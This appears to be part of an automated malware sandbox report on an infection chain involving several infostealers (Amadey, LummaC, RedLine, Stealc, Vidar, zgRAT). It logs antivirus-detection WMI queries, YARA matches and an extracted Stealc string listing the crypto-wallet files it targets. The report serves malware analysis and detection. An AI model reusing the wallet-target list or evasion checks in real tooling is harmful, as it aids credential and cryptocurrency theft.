Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\1000238002\Amadeus.exe VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000262001\385107.exe VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\1000238002\Amadeus.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_004079E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_004079E4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: crypted.exe, 00000007.00000002.2691011774.0000000001144000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: axplong.exe, 00000006.00000002.3380519963.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe, 00000007.00000002.2691011774.0000000001144000.00000004.00000020.00020000.00000000.sdmp, crypted.exe.6.dr	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000009.00000002.2841117058.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 19.2.Hkbsse.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.Hkbsse.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.Amadeus.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.Hkbsse.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.0.Amadeus.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Nework.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OmnqazpM3P.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.0.Hkbsse.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.0.Amadeus.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Nework.exe.1f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.Amadeus.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.Hkbsse.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.0.Hkbsse.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.axplong.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000000.2761389171.0000000000521000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2763337703.0000000000521000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2762025152.0000000000521000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3378407711.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.3312997597.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2083364986.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.3244606985.0000000000521000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.2751658343.00000000001F1000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2162837342.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000000.3281580871.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2122678951.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2659803462.0000000004970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2763142147.00000000001F1000.00000020.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2151587366.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.3374733512.0000000000521000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2111336808.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2764100441.0000000000521000.00000020.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123628862.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.3167830947.0000000000E21000.00000020.00000001.01000000.0000001E.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Nework[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\1000238002\Amadeus.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Amadeus[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 24.2.PureSyncInst.exe.1d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.PureSyncInst.exe.1ccc000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1d10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1d10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.PureSyncInst.exe.1d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.PureSyncInst.exe.1ccc000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1be4000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1ccc000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.caesium-image-compressor.exe.1be4000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.PureSyncInst.exe.1ccc000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002C.00000002.3330388313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3204266932.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2965363912.00000000018D2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3327893982.00000000018D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3204266932.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3371228781.0000000001E19000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3204266932.0000000001E19000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975908580.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975464614.0000000001B4C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3000690685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3371228781.0000000001CCC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975464614.0000000001C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2957476998.0000000001DE7000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2975464614.0000000001BE4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.3371228781.0000000001D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.pLAZbVgk7u.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2724562892.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.2723547615.00000000001C2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 7.2.crypted.exe.3fc5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.crypted.exe.3fc5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.6rxotqIg7H.exe.ce0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.2724562892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2691967398.0000000003FC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2867303710.0000000003168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2724132947.0000000000CE2000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2835698109.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 5328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pLAZbVgk7u.exe PID: 6448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6rxotqIg7H.exe PID: 5952, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 00000014.00000002.3033783708.000000000168E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6624, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 6624, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.pLAZbVgk7u.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\pLAZbVgk7u.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000014.00000002.3033783708.0000000001680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: RegAsm.exe, 00000009.00000002.2842758634.0000000002BC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
